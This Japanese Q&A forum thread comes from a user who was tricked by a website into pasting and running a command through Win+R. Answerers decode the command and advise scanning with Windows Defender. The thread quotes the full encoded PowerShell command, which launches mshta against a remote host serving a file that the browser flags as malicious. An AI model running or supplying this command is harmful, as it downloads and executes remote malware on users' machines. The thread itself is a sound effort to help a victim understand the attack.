ロゴキー＋RとCtrl＋Vの操作について

変なウェブサイトに入ったら
Windowsロゴキー＋R→Ctrl＋V→Enterと指示が出てきたので習ってやってしまいました。途中で怖くなってタブを全部閉じました。質問です。

１この操作によって何が行われたのですか？
２勝手に違法なファイルをダウンロード保存されてしまったりしたのでしょうか。（ストレージには何もありませんでした。）

心配性で情弱ですいません。

質問者からの補足コメント

• powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAHAAdQBiAC0AOQBjADQAZQBjADcAZgAzAGYAOQA1AGMANAA0ADgAYgA4ADUAZQA0ADYANABkADIAYgA1ADMAMwBhAGEAYwAxAC4AcgAyAC4AZABlAHYALwAyADMAbABrAGoAZgBoAHIA
  
  でした。enter押しても変なのが開かれました

  No.1の回答に寄せられた補足コメントです。 補足日時：2024/08/24 21:54

No.3 回答者： nobodyyy 回答日時： 2024/08/25 20:24

詳しくないのにすみませんが。

＞bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAHAAdQBiAC0AOQBjADQAZQBjADcAZgAzAGYAOQA1AGMANAA0ADgAYgA4ADUAZQA0ADYANABkADIAYgA1ADMAMwBhAGEAYwAxAC4AcgAyAC4AZABlAHYALwAyADMAbABrAGoAZgBoAHIA

をデコードしたら
mshta https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2. …
となりました。(https://www.base64decode.org/)

mshta.exeコマンドは
＞大雑把に言うとセキュリティが一切無い InternetExplorer のようなモノ
との事。(https://ao.depolog.com/archives/51485364.html)
つまりそのWebページに悪意あっても気づかず侵されるという事。

https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2. …
をGoogleChrome で開くと
＞危険なファイル"23lkjfhr"のダウンロードをブロックされた
と出ました。どうやら悪意あるWebページです。

ファイル"23lkjfhr"が何者なのか、までは調べきれませんでしたが
ウィルスとかの可能性が大です。

Windows Defender などでチェック,処理してください。
ウチのWindows10 PC でも見つかって対処してもらえました。

No.2 回答者： て2くん 回答日時： 2024/08/24 23:48

Windowsロゴキー＋R　→　指定して実行

Ctrl＋V　→　ペースト（貼り付け）

それで、何を実行したかにより異なる
powershell.exe なら、powershell.exe を実行したってことになるが、ただ、これで、何を実行したかにより異なる
プログラムにより異なるので・・・

No.1 回答者： nobodyyy 回答日時： 2024/08/24 21:29

＞Windowsロゴキー＋R→Ctrl＋V→Enterと指示が出てきたので

「コマンドを指定して実行」に「コマンドラインを貼付け」て「実行した」
ってことです。
あなたのPCに入ってないコマンドは実行できっこありませんが、
既存のコマンドのオプションパラメータによっては相手に有益な情報が
盗まれた可能性があります。その
＞Ctrl＋V
で貼り付けたコマンドラインの内容をここに提示してください。